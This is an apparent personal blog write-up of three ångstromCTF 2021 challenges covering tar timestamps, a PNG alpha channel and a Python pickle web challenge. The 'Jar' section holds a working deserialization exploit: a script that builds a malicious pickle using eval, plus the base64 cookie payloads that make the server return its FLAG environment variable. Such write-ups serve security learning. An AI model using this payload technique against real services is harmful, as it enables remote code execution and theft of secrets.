+++
title = "ångstrom<wbr>CTF"
date = 2021-04-02T20:00:00+10:00
author = "ketz"
background = "linear-gradient(rgba(0,0,0,.85), rgba(0,0,0,.9)) fixed, url('https://media.giphy.com/media/xUA7aOleCtaEEZ4mkw/giphy.gif') center/cover no-repeat fixed, black center center fixed"
slug = "angstromctf"
toc = true
tags = ["jeopardy", "ctf", "misc", "web", "pickle"]
description = "A 5 day jeopardy event for all skill levels"
+++

# Introduction

The long weekend is here, and it's time to grind on a CTF and do some fun
challenges. ångstromCTF is here to deliver the goods. A great bunch of people
in the US have sorted this out with some pretty legit sponsorship which means
that they can afford to open the challenges to anyone, awesome!

## Shoutouts

Thanks to the students from [Montgomery Blair High School](https://mbhs.edu/)
in Silver Spring, Maryland who put in the effort to make this happen :+1:

- Kevin Higgs
- Clarence Lam
- Jason An
- Joshua Wang
- Harikesh Kailad
- Patrick Zhang
- Joshua Piety
- Solomon Ucko

{{<spacer "tl">}}

# Challenges

## Archaic

{{<ctf/container points="50" category="misc" flag="actf{thou_hast_uncovered_ye_ol_fleg}">}}

{{<ctf/heading "Description">}}

> The archaeological team at ångstromCTF has uncovered an archive from over 100
> years ago! Can you read the contents?
>
> Access the file at `/problems/2021/archaic/archive.tar.gz` on the shell
> server.
>
> Author: kmh

{{<ctf/heading "Method">}}

Okay, we have a gzipped tar archive which we need to expand. Only problem is
that the archive has a date that doesn't make sense.

First things first, let's just try deflating it with a regular `tar` command
_(we have to do this in a directory we own, the one that stores the archive
won't work, so we make our own directory under_ `$HOME`_)_:

```bash {hl_lines=[1]}
$ tar -xzvf /problems/2021/archaic/archive.tar.gz
flag.txt
tar: flag.txt: implausibly old time stamp 1921-04-01 22:45:12
```

Wow, weird, that actually kind of worked and we have a flag file now but
there's one slight hitch. Because of the weird date, the permissions have gone
all goofy too!

```bash
$ ls -la
total 12
drwxrwxr-x 2 team7771 team7771 4096 Apr  3 12:30 .
drwx------ 4 team7771 team7771 4096 Apr  3 12:27 ..
---------- 1 team7771 team7771   37 Apr  1  1921 flag.txt
```

The good news is we are the owners of the file, so now we just need to update
the permissions bits of the files so that we can have at least read access.

```bash
$ chmod 600 flag.txt

$ ls -la
total 12
drwxrwxr-x 2 team7771 team7771 4096 Apr  3 12:30 .
drwx------ 4 team7771 team7771 4096 Apr  3 12:27 ..
-rw------- 1 team7771 team7771   37 Apr  1  1921 flag.txt
```

The file should be readable now.

```bash
$ cat flag.txt
actf{thou_hast_uncovered_ye_ol_fleg}
```

I love the smell of flags in the morning, smells like... old `tar`?
:thinking_face:


{{</ctf/container>}}

{{<spacer "tl">}}

## Fish

{{<ctf/container category="misc" points="60" flag="actf{in_the_m0rning_laughing_h4ppy_fish_heads_in_th3_evening_float1ng_in_your_soup}">}}

{{<ctf/heading "Description">}}

> Oh, fish! My dinner has turned transparent again. What will I eat now that I
> can't eat that yummy, yummy, fish head, mmmmmm head of fish mm so good...
>
> Author: kmh

{{<ctf/heading "Method">}}

Hmmm okay, we're given an image file: `fish.png` which appears to be just an
empty (completely transparent file).

Tried out `binwalk` and briefly scanned through the hex of the file, didn't
appear to be a steganography-related challenge.

The description mentions transparency, so I followed that as an avenue. Unlike
JPEGs, PNGs support transparency by using an additional channel to store alpha
values. JPEG is only
<abbr title="Red, Green, Blue">RGB</abbr> whereas PNG is
<abbr title="Alpha, Red, Green, Blue">ARGB</abbr>.
The question is, _how do we disable the alpha channel?_

There's a great library for image manipulation called
[ImageMagick](https://imagemagick.org/index.php) which is super handy for
performing a variety of operations on images _(one time I wrote a script to
generate a QR code animated gif to store chunked data which was kind of cool)_.

Using the library is pretty straightforward in this instance, we'll use the
`convert` command:

```bash
$ convert fish.png -alpha off output.png
```
What this will do is take in `fish.png`, switch off the alpha channel, and then
spit it out as `output.png`. Sure enough we get an image with our flag :muscle:

![](./images/fish-output.png "Revealed flag")

_This flag also wins the prize for one of the longest flags I've ever seen_
and the picture that contained it will fuel my nightmares for __weeks__
:upside_down_face:

Thanks a lot `@kmh` :neutral_face: _(the challenge was cool though)_ :+1:

{{</ctf/container>}}

{{<spacer "tl">}}

## Jar

{{<ctf/container points="70" category="web" flag="actf{you_got_yourself_out_of_a_pickle}" >}}

{{<ctf/heading "Description">}}

> My other pickle challenges seem to be giving you all a hard time, so here's a
> simpler one to get you warmed up.
>
> `jar.py`, `pickle.jpg`, `Dockerfile`
>
>Author: kmh

{{<ctf/heading "Method">}}

> _I thought I knew Python reasonably well before this, but the whole `pickle`
> thing is something I'd never touched before. To me it's a weird and goofy way
> of serializing data that is too language-specific to really be worthwhile
> looking at, I generally opt for data formats with better interoperability.
> Anyway, the challenge is the challenge and learning new things is the aim of
> the game, so away we go._

We load up the challenge's page and take a look at the resources provided.
Server code is provided, so that makes it pretty clear to see what's going on
behind the scenes. We also have a massive picture of a jar of pickles. This is
very much going to be about Python and pickling.

Our entrypoint is going to be this function in the server code:

<label>`/` route for `jar.py`</label>

```python {linenos=true,linenostart=16,hl_lines=[4]}
@app.route('/')
def jar():
    contents = request.cookies.get('contents')
    if contents: items = pickle.loads(base64.b64decode(contents))
    else: items = []
    return '<form method="post" action="/add" style="text-align: center; width: 100%"><input type="text" name="item" placeholder="Item"><button>Add Item</button><img style="width: 100%; height: 100%" src="/pickle.jpg">' + \
        ''.join(f'<div style="background-color: white; font-size: 3em; position: absolute; top: {random.random()*100}%; left: {random.random()*100}%;">{item}</div>' for item in items)
```

`Line 19` is particularly relevant because we can see that the server is
blindly loading the value of the `contents` cookie without performing any kind
of validation. This code is equivalent to:

{{<quote author="Line 19">}} Do we have a certain cookie? Yes? Well then I
assume that its value is a base64-encoded pickle and that it will _definitely_
be <u>completely safe to de-serialize</u> so I'm just going to do that now...
nothing to see here!{{</quote>}}

That's not security, that's blind trust. Great job `Line 19`, nothing bad will
ever happen with things setup this way /s :unamused:

We know the right path, now to get the flag. After reading the rest of the
server code in `jar.py`, we also know that the flag is provided as an
environment variable to the server process, evidenced in this line:

```python
flag = os.environ.get('FLAG', 'actf{FAKE_FLAG}')
```

> This is setting the `flag` variable to be the value of the `$FLAG` env
> variable, or falling back on `actf{FAKE_FLAG}` if the env variable is
> undefined.

We need to use our the cookie parsing vulnerability to inject our own code into
the server to return the flag. Thankfully this is well documented online and we
can pull some [existing
code](https://gist.github.com/mgeeky/cbc7017986b2ec3e247aab0b01a9edcd) _(thanks
mgeeky)_ to lean against for the RCE part.

> We do have to make one small change to this code, as we want to execute
> Python code instead of system commands, so we'll swap `os.system` for `eval`
> in the return value of the `__reduce__()` method.

<label>`pickle-payload.py`</label>

```python {linenos=true,hl_lines=[11]}
import pickle
import sys
import base64

DEFAULT_COMMAND = "print('hello world')"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    def __reduce__(self):
        import os
        return (eval, (COMMAND,))

print(base64.b64encode(pickle.dumps(PickleRce())))
```

> Creates a base64-encoded pickle payload that will execute Python code when
> deserialized. Prints out the result to the terminal.  [See
> here](https://stackoverflow.com/a/19874769) for more about `__reduce__()`
> when pickling.

Let's run the script to generate our base64-encoded pickle, and try it out as a
cookie value.

```bash
$ python pickle-payload.py 'os.environ.get("FLAG")'
b'gASVMgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwWb3MuZW52aXJvbi5nZXQoIkZMQUciKZSFlFKULg=='
```

> Run the script to generate a base64-encoded pickle that contains the eval
> payload we want to run on the server.

Okay great, we set that as the value of the `contents` cookie and we got the
flag, except that it's split up into individual characters and spread out all
over the screen. :disappointed:

The server code is expecting a list and we've provided a string so it's slicing
each character of the string and using them as list items. If we wrap our
original payload with `[]`, we'll get on much better.

```bash
$ python pickle-payload.py '[os.environ.get("FLAG")]'
b'gASVNAAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwYW29zLmVudmlyb24uZ2V0KCJGTEFHIildlIWUUpQu'
```

> Regenerate the payload, encapsulating the RCE code inside a list.

Perfect! Now it treats our payload as a single item and returns the result as a
single div with an easy to read flag. :tada:

{{</ctf/container>}}

# Wrap-up

I didn't really manage to invest the amount of time and attention that I would
have liked to on this CTF, other life stuff just got in the way. I at least
managed to complete these challenges and attempted a few others but ran into
difficulties and couldn't make the final conversion for a flag. If it's the
same as the other years then the challenges will stay available at
[2021.angstromctf.com](https://2021.angstromctf.com/challenges) so I might
revisit this and update later on.

No two ways about it though, hats off to the kids down at MBHS though because
they've smashed it out of the park once again.